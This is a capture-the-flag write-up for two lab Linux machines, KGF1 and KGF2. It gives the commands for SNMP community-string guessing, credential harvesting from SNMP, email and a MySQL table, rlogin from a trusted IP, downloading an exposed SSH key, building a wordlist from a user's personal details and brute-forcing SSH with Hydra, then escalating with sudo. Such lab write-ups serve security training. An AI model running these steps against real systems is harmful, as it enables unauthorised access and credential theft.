CTF WRITEUP WHITE BOX HARD

KGF — White Box Pentest Writeup

Two-machine series: KGF1 (SNMP enumeration, R-services, MySQL lateral movement) and KGF2 (SSH key exfiltration, OSINT-based password cracking, sudo escalation).

person

Written By

Thomas_Shelby

Difficulty

Author

Thomas_Shelby

Machines

KGF1 · KGF2

KGF Machine
Machine: KGF1 + KGF2 · Hard · Linux · White Box
PART 01 — KGF1 · 10.0.0.27

KGF1 is configured on a NAT network (10.0.0.0/24). The attack chain involves multi-protocol enumeration (TCP + UDP), SNMP credential leak, IMAPS email access, R-services login, and MySQL lateral movement to a privileged user.

01_KGF1_Port_Scanning

terminal / nmap TCP
$ sudo nmap 10.0.0.27 -p- -Pn -n -sV

PORT    STATE  SERVICE
21/tcp  open   ftp
110/tcp open   pop3
143/tcp open   imap
512/tcp open   exec       (R-services)
513/tcp open   login      (R-services)
514/tcp open   shell      (R-services)
993/tcp open   ssl/imap
995/tcp open   ssl/pop3
terminal / FTP anonymous login
$ sudo nmap 10.0.0.27 -p 21 --script ftp-anon -n -Pn
[+] Anonymous FTP login allowed

$ ftp 10.0.0.27
Name: anonymous

ftp> ls -a
.main.txt    → no useful info
.secret.txt  → "Check the UDP ports"

02_KGF1_SNMP_Enumeration

terminal / UDP scan + SNMP walk
# UDP scan
$ sudo nmap -sU -F -Pn -n 10.0.0.27

68/udp   open|filtered  dhcpc
161/udp  open           snmp

# Discover community string
$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.0.0.27
[+] Community string: public

# Full SNMP walk
$ snmpwalk -c public 10.0.0.27 -v2c
[+] Username and password found in SNMP string output → [REDACTED]

Note — R-Services Restriction

R-services (rlogin) only accept connections from trusted IP addresses. Without knowing the trusted IP range, we first use the SNMP credentials against IMAPS to read emails and discover the trusted IP information.

03_KGF1_IMAPS_Email_Access

terminal / openssl IMAPS
$ openssl s_client -connect 10.0.0.27:imaps

# Authenticate and read inbox
1 LOGIN [REDACTED] [REDACTED]
1 SELECT INBOX
1 FETCH 1 BODY[]

[+] Email contains: new username, password + R-login trusted IP range

The email reveals the R-login trusted IP range. Assign a static IP within that range to the attacker machine's network interface before proceeding.

04_KGF1_Rlogin_and_MySQL

terminal / rlogin + mysql
# Login via R-services (from trusted IP)
$ rlogin -l [REDACTED] 10.0.0.27
Password: [REDACTED]

$ sudo -l  → No sudo privileges
$ cat .bash_history  → MySQL login command found

# MySQL enumeration
$ mysql -u garuda -p
Enter password: [REDACTED]

mysql> SHOW DATABASES;
mysql> USE passwords;
mysql> SHOW TABLES;
mysql> SELECT * FROM users;

[+] Multiple usernames and passwords retrieved from users table

# Check valid system users (/etc/passwd)
User 4 from the database exists as a system user

$ rlogin -l [REDACTED] 10.0.0.27
Password: [REDACTED]

$ sudo -l  → Full sudo privileges granted!
$ sudo su
# cat /root/flag.txt  ← ROOT FLAG
PART 02 — KGF2 · 10.0.0.28

KGF2 introduces a dual-SSH-port setup: port 22 enforces public-key-only auth, while port 2222 allows password auth — making it brute-forceable. The chain uses HTTP enumeration to exfiltrate an SSH private key, CUPP-based OSINT wordlist creation, Hydra brute force, and sudo escalation.

05_KGF2_Reconnaissance

terminal / nmap KGF2
$ sudo nmap -Pn -n 10.0.0.28

21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
2222/tcp open  ssh

# Check SSH auth methods per port
$ nmap -p22   10.0.0.28 --script ssh-auth-methods
→ publickey only (brute force NOT possible)

$ nmap -p2222 10.0.0.28 --script ssh-auth-methods
→ publickey + password (brute force POSSIBLE)

06_KGF2_HTTP_Enum_and_SSH_Key

terminal / FTP + HTTP enum
# FTP hint file
$ ftp 10.0.0.28
> get hint.txt
Hint: check /robots.txt

# robots.txt reveals /ssh directory
$ curl http://10.0.0.28/robots.txt
Disallow: /ssh

# /ssh directory contains
http://10.0.0.28/ssh/adheera.html   → user bio / OSINT data
http://10.0.0.28/ssh/id_rsa         → private SSH key

# Download key
$ wget http://10.0.0.28/ssh/id_rsa
$ chmod 600 id_rsa
$ ssh -i id_rsa adheera@10.0.0.28

adheera@kgf2:~$ cat README.md
Hint: adheera is a sudoer — find the password

07_KGF2_OSINT_Wordlist_and_Brute_Force

The adheera.html page contains personal information about the user. CUPP (Common User Passwords Profiler) generates a targeted wordlist. Port 2222 allows password auth, so Hydra is used there — not port 22.

terminal / CUPP + Hydra
# Build OSINT-based wordlist
$ git clone https://github.com/Mebus/cupp
$ cd cupp && python cupp.py -i
→ Enter details from adheera.html
→ Output: adheera.txt

# Brute force port 2222 (password auth enabled)
$ hydra -l adheera -P adheera.txt ssh://10.0.0.28 -s 2222 -I

[2222][ssh] host: 10.0.0.28  login: adheera  password: [REDACTED]

08_KGF2_Root_via_Sudo

terminal / sudo escalation
$ sudo su
Password: [REDACTED]

# whoami → root
# cd /root
# cat finalflag.txt

KGF2{4743565XXXXXXXXXXXXXXXXXXXXX7d89}  ← FINAL FLAG

09_Attack_Chain_Summary

KGF1 Chain

  1. 01 TCP scan → FTP/IMAP/R-services
  2. 02 FTP anon → .secret.txt → "check UDP"
  3. 03 UDP scan → SNMP 161/udp
  4. 04 onesixtyone → "public" community string
  5. 05 snmpwalk → credentials leaked
  6. 06 IMAPS openssl → email with trusted IP + new creds
  7. 07 Static IP assigned → rlogin
  8. 08 .bash_history → MySQL → users table
  9. 09 User 4 → rlogin → sudo su → ROOT

KGF2 Chain

  1. 01 Nmap → dual SSH (22 pubkey, 2222 password)
  2. 02 FTP → hint.txt → check robots.txt
  3. 03 robots.txt → /ssh directory
  4. 04 /ssh/adheera.html → user OSINT data
  5. 05 /ssh/id_rsa → private key download
  6. 06 SSH login with private key → README.md hint
  7. 07 CUPP with OSINT data → adheera.txt wordlist
  8. 08 Hydra on port 2222 → password cracked
  9. 09 sudo su → ROOT → final flag